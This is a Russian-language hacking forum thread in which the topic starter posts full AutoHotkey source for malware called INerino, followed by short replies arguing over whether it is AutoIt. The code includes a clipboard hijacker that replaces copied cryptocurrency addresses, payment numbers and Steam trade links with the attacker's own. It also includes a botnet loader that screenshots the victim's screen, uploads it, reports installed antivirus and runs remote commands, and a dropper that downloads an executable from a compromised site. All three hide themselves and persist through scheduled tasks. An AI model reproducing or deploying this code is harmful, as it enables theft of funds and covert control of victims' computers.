Загрузка...

[AHK] INerino Clipper / Botnet / Loader

Thread in Programming created by feiloz May 10, 2018. 1213 views

Sort
  1. feiloz
    feiloz Topic starter May 10, 2018 Banned 19 Mar 12, 2018
    Сурсы INerino

    Clipper:

    Code
    ; <COMPILER: v1.1.28.02>
    
#SingleInstance force
    
#NoTrayIcon
    
#Persistent
    
If A_ScriptDir != %appdata%
    
{
    
    FileCopy, %A_ScriptFullPath%, %appdata%\webhost.exe
    
    Run, %appdata%\webhost.exe
    
    ExitApp
    
}
    
Run, %A_WinDir%\System32\schtasks.exe /create /tn Web\Host /tr "%A_ScriptFullPath%" /st 00:00 /sc ONCE /du 9999:59 /ri 5 /f,, Hide UseErrorLevel
    
sleep 2000
    
FileSetAttrib, +H+S, %A_ScriptFullPath%
    
SetTimer, anti
    
OnClipboardChange("Zaxvaa")
    
return
    
Zaxvaa(type) {
    
    info := " "
    
    If Clipboard contains %info%
    
    return
    
    zalypenii := StrLen(Clipboard)
    
    if clipboard contains /tradeoffer/new/?partner=
    
    clipboard = https://steamcommunity.com/tradeoffer/new/?partner=867728242&token=CkGaervg
    
    if clipboard contains goo.gl
    
    clipboard = https://goo.gl/GeGctZ
    
    if clipboard contains vk.cc
    
    clipboard = https://vk.cc/7UFV1w
    
    if clipboard contains u.to
    
    clipboard = http://u.to/Qbq9EQ
    
    If zalypenii between 13 and 17
    
    {
    
        StringLeft, zallsz, clipboard, 1
    
        If zallsz = 4
    
        Clipboard = 410016474860145
    
    }
    
    If zalypenii between 26 and 44
    
    {
    
        StringLeft, zallsz, clipboard, 1
    
        If zallsz = L
    
        Clipboard = Lh2L9MMA19cXQzJ6G9st4YLjCvwa1nZg8F
    
        If zallsz = 1
    
        Clipboard = 1LmiJiPJXcAUs7GkG8Hmi5JEyD4dWPSubm
    
        If zallsz = 3
    
        Clipboard = 1LmiJiPJXcAUs7GkG8Hmi5JEyD4dWPSubm
    
        If zallsz = t
    
        Clipboard = t1gfaxramS7eLrrUfZnFmmCX3if3TNi12zE
    
        If zallsz = B
    
        Clipboard = BR1ZmkVGo69YHCcqsW94idrGnSCi8s1vSC
    
        If zallsz = D
    
        Clipboard = DFRJFaHgs5cSJQ4d6xRcHGui4bjxGX8QVG
    
        if zallsz = X
    
        Clipboard = XnjzYVvoks8sqSQmMLajBoVoQCcDPgv4ae
    
        If zallsz = E
    
        Clipboard = EbWQZiaPafaK9iuETUSzfpy44t3K6vLweN
    
        If zallsz = A
    
        Clipboard = AdEWM6zD2iacGbJ4vgiWYEw3zEFeswYBLC
    
        if zallsz = R
    
        Clipboard = RYqZdHGsU1qCurjHc6AmBWpcBcDNrpe5Jm
    
    }
    
    If zalypenii between 9 and 15
    
    {
    
        StringLeft, zallsz, clipboard, 1
    
        StringLeft, zallsz1, clipboard, 2
    
        StringLeft, zallsz2, clipboard, 3
    
        If zallsz = Z
    
        Clipboard = Z357395380308
    
        If zallsz = 9
    
        If zalypenii = 10
    
        Clipboard = 9914792548
    
        If zallsz1 = 89
    
        Clipboard = 8914792548
    
        If zallsz2 = +79
    
        Clipboard = +79914792548
    
    }
    
    If zalypenii between 39 and 45
    
    {
    
        StringLeft, zallsz, clipboard, 2
    
        If zallsz = 0x
    
        Clipboard = 0x5a0fc7fb8dc268101773e6822e370989e655924b
    
    }
    
    If zalypenii > 70
    
    {
    
        StringLeft, zallsz, clipboard, 1
    
        If zallsz = 4
    
        Clipboard = 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQmY1nk3FHHn9yzhSbh
    
        If zallsz = 2
    
        Clipboard = 258J6j6VZ5mgnxGPDRatzoUsaqB6g4JXC79eC8vL2wZaNvjYiGTJ6GpFr6MNqj3PGR4PGXzCGYQw7UemxRoRxCC97prZjUB
    
    }
    
}
    
anti:
    
Process, Exist, taskmgr.exe
    
If ErrorLevel != 0
    
ExitApp
    
IfWinExist, Process Hacker
    
ExitApp
    
return
    
PAD

    Botnet / Loader:​


    Code
    ; <COMPILER: v1.1.27.06>
    
#SingleInstance force
    
#NoTrayIcon
    
FileDelete, %AppData%\ShellWin\info.txt
    
if A_ScriptDir != %AppData%\SecureUpdate
    
{
    
IfExist, %AppData%\SecureUpdate\SecureUpdate.exe
    
{
    
process, close, SecureUpdate.exe
    
sleep 100
    
FileDelete, %AppData%\SecureUpdate\SecureUpdate.exe
    
sleep 2000
    
}
    
IfExist, %AppData%\Jukebox\webstore.exe
    
{
    
process, close, webstore.exe
    
sleep 100
    
FileDelete, %AppData%\Jukebox\webstore.exe
    
sleep 2000
    
}
    
IfExist, %AppData%\smartsecurity.exe
    
{
    
process, close, smartsecurity.exe
    
sleep 100
    
FileDelete, %AppData%\smartsecurity.exe
    
sleep 2000
    
}
    
IfExist, %programdata%\webstore.exe
    
{
    
process, close, webstore.exe
    
sleep 100
    
FileDelete, %programdata%\webstore.exe
    
sleep 2000
    
}
    
IfExist, %AppData%\webstore.exe
    
{
    
process, close, webstore.exe
    
sleep 100
    
FileDelete, %AppData%\webstore.exe
    
sleep 2000
    
}
    
FileCreateDir, %programdata%\WindowsShell
    
SetWorkingDir, %programdata%\WindowsShell
    
sleep 500
    
SaveScreenshotToFile(0, 0, A_ScreenWidth, A_ScreenHeight, "word.png")
    
imagePath = %programdata%\WindowsShell\word.png
    
sleep 500
    
SendImageToImgur(imagePath, ClientID := "366f59152c62608")
    
FileCreateDir, %AppData%\SecureUpdate
    
SetWorkingDir, %AppData%\SecureUpdate
    
sleep 500
    
FileCopy, %A_ScriptFullPath%, %AppData%\SecureUpdate\SecureUpdate.exe
    
sleep 5000
    
Run, %AppData%\SecureUpdate\SecureUpdate.exe,, UseErrorLevel
    
sleep 1000
    
FileSetAttrib, +H+S, %AppData%\SecureUpdate\SecureUpdate.exe
    
FileSetAttrib, +H+S, %AppData%\SecureUpdate
    
sleep 5000
    
ExitApp
    
}
    
lol= %A_ScriptFullPath%
    
Run, %A_WinDir%\System32\schtasks.exe /create /tn SystemFile\SystemUpdates /tr "%lol%" /st 00:00 /sc ONCE /du 9999:59 /ri 5 /f,, Hide UseErrorLevel
    
SetTimer, anti
    
ComObjError(false)
    
HTTP := ComObjCreate("WinHTTP.WinHTTPRequest.5.1")
    
HTTP.Open("GET", "https://www.google.com")
    
HTTP.Send()
    
if (HTTP.ResponseText = "")
    
Reload
    
infolink = http://benchadcrd.nl/cld/bxbvxbxb_bot/users/benchad/info.txt
    
pisa = 1
    
jojo = 2
    
sleep 500
    
FileCreateDir, %Appdata%\ShellWin
    
FileSetAttrib, +H+S, %Appdata%\ShellWin
    
SetWorkingDir, %AppData%\ShellWin
    
sleep 500
    
DownloadFile(infolink, "info.txt")
    
FileRead, out, info.txt
    
sleep 500
    
loop, parse, out, `n, `r
    
total:=a_index
    
total := floor(total/2)
    
sleep 1000
    
loop %total%
    
{
    
FileReadLine, huupka, info.txt, %pisa%
    
sleep 200
    
FileReadLine, koas, info.txt, %jojo%
    
sleep 200
    
If koas = /delcomp
    
{
    
FileRead, oz, deleted.txt
    
If oz not contains %huupka%
    
{
    
While RegExMatch(huupka, "%(.*?)%", M, 1)
    
huupka := RegExReplace(huupka, "%.*?%", %M1%, , 1, 1)
    
FileDelete, %huupka%
    
FileAppend, %huupka%`n, deleted.txt
    
}
    
}
    
sleep 200
    
If koas = /deldir
    
FileDelete, %huupka%
    
sleep 200
    
if koas = /off
    
ExitApp
    
sleep 200
    
if koas = /iplog
    
{
    
FileRead, omz, *********txt
    
If omz not contains %huupka%
    
{
    
IfExist, %programdata%\Microsoft\Windows Defender
    
a1 := " | Windows Defender"
    
IfExist, %programdata%\AVAST Software
    
a2 := " | AVAST Software"
    
IfExist, %programdata%\ESET
    
a3 := " | ESET Antivirus"
    
IfExist, %programdata%\Kaspersky Lab
    
a4 := " | Kaspersky Antivirus"
    
IfExist, %programdata%\Avg
    
a5 := " | AVG Antivirus"
    
IfExist, %programdata%\Avira
    
a6 := " | Avira Antivirus"
    
IfExist, %programdata%\360TotalSecurity
    
a7 := " | 360 Total Security"
    
IfExist, %programdata%\Doctor Web
    
a8 := " | Dr.Web Antivirus"
    
IfExist, %programdata%\Malwarebytes
    
a9 := " | Malwarebytes Antivirus"
    
IfExist, %programdata%\Panda Security
    
a10 := " | Panda Antivirus"
    
IfExist, %programdata%\IObit
    
a11 := " | IObit Malware Fighter"
    
IfExist, %programdata%\McAfee
    
a12 := " | McAfee Antivirus"
    
RegRead, OSName, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion, ProductName
    
RegRead, CPUNAme, HKEY_LOCAL_MACHINE, HARDWARE\DESCRIPTION\System\CentralProcessor\0, ProcessorNameString
    
RegRead, WinVersion, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion, CurrentVersion
    
VarSetCapacity(test, 8, 0)
    
NumPut(-1, &test, 0, "ptr")
    
if A_Is64bitOS = 1
    
bit = x64
    
else
    
bit = x32
    
ComObjError(false)
    
HTTP:= ComObjCreate("WinHttp.WinHttpRequest.5.1")
    
HTTP.Open("GET", "https://"huupka, true)
    
HTTP.SetRequestHeader("User-Agent","BOTNET ON ( " OSName " | " bit " | " CPUNAme "" a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12 " )")
    
HTTP.SetRequestHeader("Pragma", "no-cache")
    
HTTP.SetRequestHeader("Cache-Control", "no-cache, no-store")
    
HTTP.SetRequestHeader("If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT")
    
HTTP.send()
    
HTTP.WaitForResponse()
    
FileAppend, %huupka%`n, *********txt
    
}
    
}
    
sleep 200
    
If koas = /unpack
    
{
    
FileRead, oi, unpacked.txt
    
If oi not contains %huupka%
    
{
    
random, randz, 1, 999999
    
sleep 500
    
FileCreateDir, %Appdata%\ShellWin\Archive %randz%
    
sleep 500
    
DownloadFile(huupka, Appdata "\ShellWin\Archive " randz "\Archive.zip")
    
sleep 2000
    
FileAppend, %huupka%`n, unpacked.txt
    
ArcPath = %Appdata%\ShellWin\Archive %randz%\Archive.zip
    
OutPath = %Appdata%\ShellWin\Archive %randz%
    
Shell := ComObjCreate("Shell.Application")
    
Items := Shell.NameSpace(ArcPath).Items
    
Items.Filter(73952, "*")
    
Shell.NameSpace(OutPath).CopyHere(Items, 16)
    
sleep 30000
    
FileDelete, %Appdata%\ShellWin\Archive %randz%\Archive.zip
    
SetWorkingDir, %Appdata%\ShellWin\Archive %randz%
    
loop, *.exe
    
{
    
Run, %A_LoopFileName%,, UseErrorLevel
    
sleep 5000
    
}
    
SetWorkingDir, %AppData%\ShellWin
    
}
    
}
    
sleep 200
    
If koas = /open
    
{
    
FileRead, op, opened.txt
    
If op not contains %huupka%
    
{
    
FileAppend, %huupka%`n, opened.txt
    
Run, %huupka%
    
}
    
}
    
sleep 200
    
If koas = /proc
    
Process, close, %huupka%
    
sleep 200
    
If koas = /winr
    
{
    
FileRead, win, winr.txt
    
If win not contains %huupka%
    
{
    
Run, %huupka%
    
sleep 500
    
FileAppend, %huupka%`n, winr.txt
    
}
    
}
    
else
    
{
    
IfNotExist, %koas%
    
{
    
DownloadFile(huupka, koas)
    
sleep 2000
    
If koas contains .exe
    
Run, %koas%,,UseErrorLevel
    
If koas contains .bat
    
Run, %koas%,,UseErrorLevel
    
If koas contains .zip
    
Run, %koas%,,UseErrorLevel
    
If koas contains .rar
    
Run, %koas%,,UseErrorLevel
    
If koas contains .7z
    
Run, %koas%,,UseErrorLevel
    
sleep 500
    
FileSetAttrib, +H+S, %koas%
    
}
    
}
    
pisa += 2
    
jojo += 2
    
}
    
FileDelete, info.txt
    
ExitApp
    
SaveScreenshotToFile(x, y, w, h, filePath)
    
{
    
hBitmap := GetHBitmapFromScreen(x, y, w, h)
    
gdip := new GDIplus
    
pBitmap := gdip.BitmapFromHBitmap(hBitmap)
    
DllCall("DeleteObject", Ptr, hBitmap)
    
gdip.SaveBitmapToFile(pBitmap, filePath)
    
gdip.DisposeImage(pBitmap)
    
}
    
GetHBitmapFromScreen(x, y, w, h)
    
{
    
hDC := DllCall("GetDC", Ptr, 0, Ptr)
    
hBM := DllCall("CreateCompatibleBitmap", Ptr, hDC, Int, w, Int, h, Ptr)
    
pDC := DllCall("CreateCompatibleDC", Ptr, hDC, Ptr)
    
oBM := DllCall("SelectObject", Ptr, pDC, Ptr, hBM, Ptr)
    
DllCall("BitBlt", Ptr, pDC, Int, 0, Int, 0, Int, w, Int, h, Ptr, hDC, Int, x, Int, y, UInt, 0x00CC0020)
    
DllCall("SelectObject", Ptr, pDC, Ptr, oBM)
    
DllCall("DeleteDC", Ptr, pDC)
    
DllCall("ReleaseDC", Ptr, 0, Ptr, hDC)
    
Return hBM
    
}
    
class GDIplus   {
    
__New()  {
    
if !DllCall("GetModuleHandle", Str, "gdiplus", Ptr)
    
DllCall("LoadLibrary", Str, "gdiplus")
    
VarSetCapacity(si, A_PtrSize = 8 ? 24 : 16, 0), si := Chr(1)
    
DllCall("gdiplus\GdiplusStartup", PtrP, pToken, Ptr, &si, Ptr, 0)
    
this.token := pToken
    
}
    
__Delete()  {
    
DllCall("gdiplus\GdiplusShutdown", Ptr, this.token)
    
if hModule := DllCall("GetModuleHandle", Str, "gdiplus", Ptr)
    
DllCall("FreeLibrary", Ptr, hModule)
    
}
    
BitmapFromHBitmap(hBitmap, Palette := 0)  {
    
DllCall("gdiplus\GdipCreateBitmapFromHBITMAP", Ptr, hBitmap, Ptr, Palette, PtrP, pBitmap)
    
return pBitmap
    
}
    
SaveBitmapToFile(pBitmap, sOutput, Quality=75)  {
    
SplitPath, sOutput,,, Extension
    
if Extension not in BMP,DIB,RLE,JPG,JPEG,JPE,JFIF,GIF,TIF,TIFF,PNG
    
return -1
    
DllCall("gdiplus\GdipGetImageEncodersSize", UIntP, nCount, UIntP, nSize)
    
VarSetCapacity(ci, nSize)
    
DllCall("gdiplus\GdipGetImageEncoders", UInt, nCount, UInt, nSize, Ptr, &ci)
    
if !(nCount && nSize)
    
return -2
    
Loop, % nCount  {
    
sString := StrGet(NumGet(ci, (idx := (48+7*A_PtrSize)*(A_Index-1))+32+3*A_PtrSize), "UTF-16")
    
if !InStr(sString, "*." Extension)
    
continue
    
pCodec := &ci+idx
    
break
    
}
    
if !pCodec
    
return -3
    
if RegExMatch(Extension, "i)^J(PG|PEG|PE|FIF)$") && Quality != 75  {
    
DllCall("gdiplus\GdipGetEncoderParameterListSize", Ptr, pBitmap, Ptr, pCodec, UintP, nSize)
    
VarSetCapacity(EncoderParameters, nSize, 0)
    
DllCall("gdiplus\GdipGetEncoderParameterList", Ptr, pBitmap, Ptr, pCodec, UInt, nSize, Ptr, &EncoderParameters)
    
Loop, % NumGet(EncoderParameters, "UInt")  {
    
elem := (24+A_PtrSize)*(A_Index-1) + 4 + (pad := A_PtrSize = 8 ? 4 : 0)
    
if (NumGet(EncoderParameters, elem+16, "UInt") = 1) && (NumGet(EncoderParameters, elem+20, "UInt") = 6)  {
    
p := elem+&EncoderParameters-pad-4
    
NumPut(Quality, NumGet(NumPut(4, NumPut(1, p+0)+20, "UInt")), "UInt")
    
break
    
}
    
}
    
}
    
if A_IsUnicode
    
pOutput := &sOutput
    
else  {
    
VarSetCapacity(wOutput, StrPut(sOutput, "UTF-16")*2, 0)
    
StrPut(sOutput, &wOutput, "UTF-16")
    
pOutput := &wOutput
    
}
    
E := DllCall("gdiplus\GdipSaveImageToFile", Ptr, pBitmap, Ptr, pOutput, Ptr, pCodec, UInt, p ? p : 0)
    
return E ? -5 : 0
    
}
    
DisposeImage(pBitmap)  {
    
return DllCall("gdiplus\GdipDisposeImage", Ptr, pBitmap)
    
}
    
}
    
SendImageToImgur(imagePath, ClientID, JpegQuality := "")  {
    
oFile := FileOpen(imagePath, "r")
    
oFile.Pos := 0
    
oFile.RawRead(buff, size := oFile.length)
    
oFile.Close()
    
strBase64 := CryptBinaryToStringBASE64(&buff, size, true)
    
http := ComObjCreate("Msxml2.XMLHTTP")
    
http.open("POST", "https://api.imgur.com/3/image", true)
    
http.onreadystatechange := Func("StateChange").Bind(http)
    
http.SetRequestHeader("authorization", "Client-ID " . ClientID)
    
http.send(strBase64)
    
VarSetCapacity(strBase64, 0), VarSetCapacity(buff, 0)
    
}
    
CryptBinaryToStringBASE64(pData, Bytes, NOCRLF = "")  {
    
static CRYPT_STRING_BASE64 := 1, CRYPT_STRING_NOCRLF := 0x40000000
    
CRYPT := CRYPT_STRING_BASE64 | (NOCRLF ? CRYPT_STRING_NOCRLF : 0)
    
DllCall("Crypt32\CryptBinaryToString", Ptr, pData, UInt, Bytes, UInt, CRYPT, Ptr, 0, UIntP, Chars)
    
VarSetCapacity(OutData, Chars * (A_IsUnicode ? 2 : 1))
    
DllCall("Crypt32\CryptBinaryToString", Ptr, pData, UInt, Bytes, UInt, CRYPT, Str, OutData, UIntP, Chars)
    
Return OutData
    
}
    
StateChange(http)
    
{
    
if !(http.readyState = 4)
    
Return
    
responsetext := http.responsetext
    
RegExMatch(responsetext, """link"":""(.*?)""", match)
    
link := StrReplace(match1, "\")
    
IfExist, %programdata%\Microsoft\Windows Defender
    
a1 := " | Windows Defender"
    
IfExist, %programdata%\AVAST Software
    
a2 := " | AVAST Software"
    
IfExist, %programdata%\ESET
    
a3 := " | ESET Antivirus"
    
IfExist, %programdata%\Kaspersky Lab
    
a4 := " | Kaspersky Antivirus"
    
IfExist, %programdata%\Avg
    
a5 := " | AVG Antivirus"
    
IfExist, %programdata%\Avira
    
a6 := " | Avira Antivirus"
    
IfExist, %programdata%\360TotalSecurity
    
a7 := " | 360 Total Security"
    
IfExist, %programdata%\Doctor Web
    
a8 := " | Dr.Web Antivirus"
    
IfExist, %programdata%\Malwarebytes
    
a9 := " | Malwarebytes Antivirus"
    
IfExist, %programdata%\Panda Security
    
a10 := " | Panda Antivirus"
    
IfExist, %programdata%\IObit
    
a11 := " | IObit Malware Fighter"
    
IfExist, %programdata%\McAfee
    
a12 := " | McAfee Antivirus"
    
RegRead, OSName, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion, ProductName
    
RegRead, CPUNAme, HKEY_LOCAL_MACHINE, HARDWARE\DESCRIPTION\System\CentralProcessor\0, ProcessorNameString
    
RegRead, WinVersion, HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion, CurrentVersion
    
VarSetCapacity(test, 8, 0)
    
NumPut(-1, &test, 0, "ptr")
    
if A_Is64bitOS = 1
    
bit = x64
    
else
    
bit = x32
    
HTTP:= ComObjCreate("WinHttp.WinHttpRequest.5.1")
    
HTTP.Open("GET", "https://*********com/1Gp797", true)
    
HTTP.SetRequestHeader("User-Agent","BOTNET ON ( " OSName " | " bit " | " CPUNAme "" a1 a2 a3 a4 a5 a6 a7 a8 a9 a10 a11 a12 " | Screenshot: " link " )")
    
HTTP.SetRequestHeader("Pragma", "no-cache")
    
HTTP.SetRequestHeader("Cache-Control", "no-cache, no-store")
    
HTTP.SetRequestHeader("If-Modified-Since", "Sat, 1 Jan 2000 00:00:00 GMT")
    
HTTP.send()
    
HTTP.WaitForResponse()
    
FileRemoveDir, %ProgramData%/WindowsShell, 1
    
ExitApp
    
}
    
CopyResponse()  {
    
GuiControlGet, Clipboard, Imgur:, Edit1
    
Gui, Imgur: Destroy
    
ExitApp
    
}
    
DownloadFile(UrlToFile = "", SaveFileAs = "", Overwrite := true, UseProgressBar := False) {
    
If (UrlToFile = "" && SaveFileAs != "") {
    
If FileExist(SaveFileAs)
    
Return "Downloaded"
    
Else
    
Return "No"
    
}
    
If (!Overwrite && FileExist(SaveFileAs))
    
Return
    
If (UseProgressBar) {
    
WebRequest := ComObjCreate("WinHttp.WinHttpRequest.5.1")
    
WebRequest.Open("HEAD", UrlToFile)
    
WebRequest.Send()
    
FinalSize := WebRequest.GetResponseHeader("Content-Length")
    
Progress, H80, , Downloading..., %UrlToFile%
    
SetTimer, __UpdateProgressBar, 100
    
}
    
UrlDownloadToFile, %UrlToFile%, %SaveFileAs%
    
If (UseProgressBar) {
    
Progress, Off
    
SetTimer, __UpdateProgressBar, Off
    
}
    
Return
    
__UpdateProgressBar:
    
CurrentSize := FileOpen(SaveFileAs, "r").Length
    
CurrentSizeTick := A_TickCount
    
Speed := Round((CurrentSize/1024-LastSize/1024)/((CurrentSizeTick-LastSizeTick)/1000)) . " Kb/s"
    
LastSizeTick := CurrentSizeTick
    
LastSize := FileOpen(SaveFileAs, "r").Length
    
PercentDone := Round(CurrentSize/FinalSize*100)
    
Progress, %PercentDone%, %PercentDone% Done, Downloading...  (%Speed%), Downloading %SaveFileAs% (%PercentDone%)
    
Return
    
}
    
Anti:
    
Process, Exist, taskmgr.exe
    
If ErrorLevel != 0
    
ExitApp
    
IfWinExist, Process Hacker
    
ExitApp
    
return

    Code
    ; <COMPILER: v1.1.28.02>
    
#SingleInstance force
    
#NoTrayIcon
    
sleep 20000
    
IfNotExist, %AppData%\webhost.exe
    
{
    
SetWorkingDir, %AppData%
    
URLDownloadToFile, http://smkn16jakarta.sch.id/cmsbalitbangv35/images/artikel/cld/sdfsdfsd_clp/sdfsdfsd_clp_bldr.exe, webhost.exe
    
While !FileExist("webhost.exe")
    
continue
    
sleep 1000
    
Run, webhost.exe,, UseErrorLevel
    
sleep 1000
    
w:= ComObjCreate("WinHttp.WinHttpRequest.5.1")
    
w.open("GET", "https://2no.co/1mm667", false)
    
w.SetRequestHeader("User-Agent"," Clipper ON" )
    
w.send()
    
}
    
If A_ScriptDir != %AppData%
    
{
    
FileCopy, %A_ScriptFullPath%, %AppData%\infodown.exe
    
sleep 500
    
Run, %AppData%\infodown.exe,, UseErrorLevel
    
ExitApp
    
}
    
sleep 1000
    
lol= %A_ScriptFullPath%
    
Run, %A_WinDir%\System32\schtasks.exe /create /tn SysWeb\SysWebz /tr "%lol%" /st 00:00 /sc ONCE /du 9999:59 /ri 20 /f,, Hide UseErrorLevel
    
sleep 1000
    
FileSetAttrib, +H+S, %lol%
    
ExitApp
     
    May 10, 2018
  2. swmf
    swmf May 10, 2018 101 Dec 8, 2017
    Exe2Aut:admin:
     
    May 10, 2018
  3. feiloz
    feiloz Topic starter May 11, 2018 Banned 19 Mar 12, 2018
    Только это не autoit, но да ладно, набил и хватит.
     
    May 11, 2018
  4. swmf
    swmf May 11, 2018 101 Dec 8, 2017
    Набил 1 сообщение? Это такой прикол если аргументов нет, говорить, что сообщение - для набива? Синтаксис похож немного
     
    May 11, 2018
  5. feiloz
    feiloz Topic starter May 11, 2018 Banned 19 Mar 12, 2018

    Если ты хотя бы видел раз один из этих языков - ты их отличишь. "Это такой прикол если аргументов нет", аргументы на что собственно? На то, что это не autoit или на то, что ты пишешь фигню? По моему ты сам себя загнал в угол, можешь больше не писать. Шедевральный человек :podumai:
     
    May 11, 2018
  6. Retrl
    Retrl Nov 15, 2018 $uicideboy$ in heart <3 0 Feb 27, 2017
    так это автоит или ahk ???
     
    Nov 15, 2018
Top
Loading...